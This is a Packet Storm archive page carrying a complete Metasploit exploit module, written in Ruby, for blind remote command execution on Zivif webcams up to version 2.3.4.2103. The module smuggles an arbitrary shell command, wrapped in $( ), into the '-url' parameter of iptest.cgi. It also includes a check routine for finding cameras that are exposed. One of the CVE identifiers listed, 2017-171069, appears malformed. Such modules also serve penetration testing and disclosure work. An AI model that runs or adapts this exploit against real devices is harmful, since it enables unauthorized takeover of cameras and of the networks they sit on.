what you don't know can hurt you

Zivif Camera 2.3.4.2103 iptest.cgi Blind Remote Command Execution

Zivif Camera 2.3.4.2103 iptest.cgi Blind Remote Command Execution
Posted Jun 16, 2020
Authored by Silas Cutler | Site metasploit.com

This Metasploit module exploits a remote command execution vulnerability in Zivif webcams. This is known to impact versions prior to and including 2.3.4.2103.

tags | exploit, remote
advisories | CVE-2017-17105, CVE-2017-171069
MD5 | 866cab75a033c98926f601f67b982f96

Zivif Camera 2.3.4.2103 iptest.cgi Blind Remote Command Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(update_info(info,
'Name' => 'Zivif Camera iptest.cgi Blind Remote Command Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in Zivif
webcams. This is known to impact versions prior to and including v2.3.4.2103.
Exploit was reported in CVE-2017-17105.
},
'License' => MSF_LICENSE,
'Author' => [ 'Silas Cutler (p1nk)' ],
'References' =>
[
[ 'URL', 'https://seclists.org/fulldisclosure/2017/Dec/42' ],
[ 'CVE', '2017-171069' ]
],
'Platform' => 'unix',
'Targets' =>
[
[ 'Automatic Target', { }]
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x27",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic'
}
},
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/generic',
},
'Privileged' => false,
'DisclosureDate' => "2017-09-01",
'DefaultTarget' => 0))
end

def check
res = send_request_cgi('uri' => normalize_uri('cgi-bin', 'iptest.cgi'))
unless res
vprint_error('Connection failed')
return Exploit::CheckCode::Unknown
end
unless res.code && res.code == 200
return CheckCode::Safe
end

CheckCode::Detected
end

def exploit
print_status("Sending request")
cmd = datastore['CMD']

res = send_request_cgi(
'uri' => normalize_uri('cgi-bin', 'iptest.cgi'),
'method' => 'GET',
'vars_get' => {
'cmd' => "iptest.cgi",
'-time' => Time.now.to_i,
'-url' => "$(" + cmd + ")"
}
)

unless res
fail_with(Failure::Unreachable, 'Connection failed')
end

if res.code && res.code == 200
print_good('Command sent successfully')
else
fail_with(Failure::UnexpectedReply, 'Unable to send command to target')
end
end

end
Login or Register to add favorites

File Archive:

May 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    1 Files
  • 2
    May 2nd
    4 Files
  • 3
    May 3rd
    26 Files
  • 4
    May 4th
    17 Files
  • 5
    May 5th
    3 Files
  • 6
    May 6th
    32 Files
  • 7
    May 7th
    11 Files
  • 8
    May 8th
    2 Files
  • 9
    May 9th
    2 Files
  • 10
    May 10th
    13 Files
  • 11
    May 11th
    17 Files
  • 12
    May 12th
    22 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    9 Files
  • 15
    May 15th
    2 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    21 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close